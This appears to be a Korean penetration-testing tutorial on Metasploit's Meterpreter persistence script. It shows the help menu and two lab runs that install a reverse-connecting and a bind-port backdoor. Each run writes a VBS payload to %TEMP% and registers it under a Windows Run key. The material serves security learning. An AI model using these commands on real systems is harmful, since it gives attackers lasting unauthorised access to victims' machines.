[MAD-METASPLOIT] 0x34 - Persistence Backdoor
Persistence backdoor
Meterpreter는 Persistence 를 이용하여 시스템에 백도어를 남겨 지속적으로 접근할 수 있는 통로를 만들 수 있습니다.
meterpreter > run persistence -h
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value […] Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
각각 옵션에 따라 부팅 시 , 로그온 시 등 설정이 가능합니다.
User 로그온 시 reverse connection 하도록 backdoor 생성
meterpreter > run persistence -U -i 5 -p 22 -r 192.168.56.101
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value […] [] Running Persistence Script [] Resource file for cleanup created at /root/.msf4/logs/persistence/HAHWUL_20170807.5914/HAHWUL_20170807.5914.rc [] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=22 [] Persistent agent script is 99642 bytes long [+] Persistent Script written to C:\Users\SILENC~1\AppData\Local\Temp\vnJKNtOW.vbs [] Executing script C:\Users\SILENC~1\AppData\Local\Temp\vnJKNtOW.vbs [+] Agent executed with PID 8068 [] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ljAYMQEIrbRBJb [+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ljAYMQEIrbRBJb
System이 부팅되자마자 22번 포트를 bind 시키는 형태의 backdoor 생성
meterpreter > run persistence -X -i 5 -p 22 -r 192.168.56.101 -P windows/meterpreter/bind_tcp
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value […] [] Running Persistence Script [] Resource file for cleanup created at /root/.msf4/logs/persistence/HAHWUL_20170807.0044/HAHWUL_20170807.0044.rc [] Creating Payload=windows/meterpreter/bind_tcp LHOST=192.168.56.101 LPORT=22 [] Persistent agent script is 99692 bytes long [+] Persistent Script written to C:\Users\SILENC~1\AppData\Local\Temp\QCaMHq.vbs [] Executing script C:\Users\SILENC~1\AppData\Local\Temp\QCaMHq.vbs [+] Agent executed with PID 1592 [] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\gOuJoRmXcHbUao [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\gOuJoRmXcHbUao